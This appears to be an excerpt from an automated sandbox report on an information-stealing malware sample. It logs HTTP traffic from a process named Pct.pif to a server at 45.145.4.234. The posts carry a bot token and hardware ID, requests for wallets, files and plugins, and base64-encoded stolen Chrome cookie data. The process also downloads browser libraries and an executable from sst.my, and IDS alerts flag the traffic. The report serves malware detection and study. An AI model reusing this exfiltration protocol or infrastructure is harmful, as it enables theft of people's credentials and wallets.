42 46 48 49 45 48 44 47 2d 2d 0d 0a Data Ascii: ------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="message"plugins------DAECAECFCAAEBFHIEHDG--
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJECHost: 45.145.4.234Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="message"fplugins------AEBGIEGCFHCFHIDHIJEC--
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAFHost: 45.145.4.234Content-Length: 6455Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/sqlite3.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFBHost: 45.145.4.234Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDBGDHDAECBGDHJKFIDHost: 45.145.4.234Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="file"------EHDBGDHDAECBGDHJKFID--
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFHHost: 45.145.4.234Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="file"------CAAAFCAKKKFBFIDGDBFH--
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/freebl3.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/mozglue.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/msvcp140.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/nss3.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/softokn3.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/vcruntime140.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCAHost: 45.145.4.234Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEGHost: 45.145.4.234Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 2d 2d 0d 0a Data Ascii: ------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="message"wallets------KJEBKJDAFHJDGDHJKKEG--
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKFHost: 45.145.4.234Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 4a 45 47 49 49 44 41 45 43 41 41 4b 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 4a 45 47 49 49 44 41 45 43 41 41 4b 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 4a 45 47 49 49 44 41 45 43 41 41 4b 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------AAEHJEGIIDAECAAKEBKFContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------AAEHJEGIIDAECAAKEBKFContent-Disposition: form-data; name="message"files------AAEHJEGIIDAECAAKEBKF--
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAAHost: 45.145.4.234Content-Length: 113523Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDHHost: 45.145.4.234Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 48 44 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 2d 2d 0d 0a Data Ascii: ------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------BGDHDAFIDGDBGCAAFIDHContent-Disposition: form-data; name="message"ybncbhylepme------BGDHDAFIDGDBGCAAFIDH--
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKEHost: 45.145.4.234Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IIJEBFCFIJJJEBGDBAKE--
                    Source: Joe Sandbox ViewASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
                    Source: Joe Sandbox ViewASN Name: ALEXHOSTMD ALEXHOSTMD
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:63885 -> 45.145.4.234:80
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:63886 -> 103.6.198.219:443
                    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:63886 -> 103.6.198.219:443
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.145.4.234
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C329BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_00C329BA
                    Source: global trafficHTTP traffic detected: GET /folder/l3.exe HTTP/1.1Host: sst.myCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.145.4.234Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/sqlite3.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/freebl3.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/mozglue.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/msvcp140.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/nss3.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/softokn3.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /bc17a177456805bc/vcruntime140.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: hFXSqazHOXBOkJfWqLCELfcAYW.hFXSqazHOXBOkJfWqLCELfcAYW
                    Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                    Source: global trafficDNS traffic detected: DNS query: sst.my
                    Source: unknownHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJEHost: 45.145.4.234Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 44 43 41 34 37 32 33 31 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="hwid"42DCA47231951117388365------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="build"default------AAKJEGCFBGDHJJJJJKJE--
                    Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, Pct.pif, 0000000B.00000002.3804413256.00000000003AB000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234
                    Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/bc17a177456805bc/freebl3.dll
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/bc17a177456805bc/mozglue.dll
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/bc17a177456805bc/msvcp140.dll
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/bc17a177456805bc/msvcp140.dllX
                    Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/bc17a177456805bc/nss3.dll
                    Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/bc17a177456805bc/nss3.dlld
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/bc17a177456805bc/softokn3.dll
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.145.4.234/bc17a177456805bc/softokn3.dlln
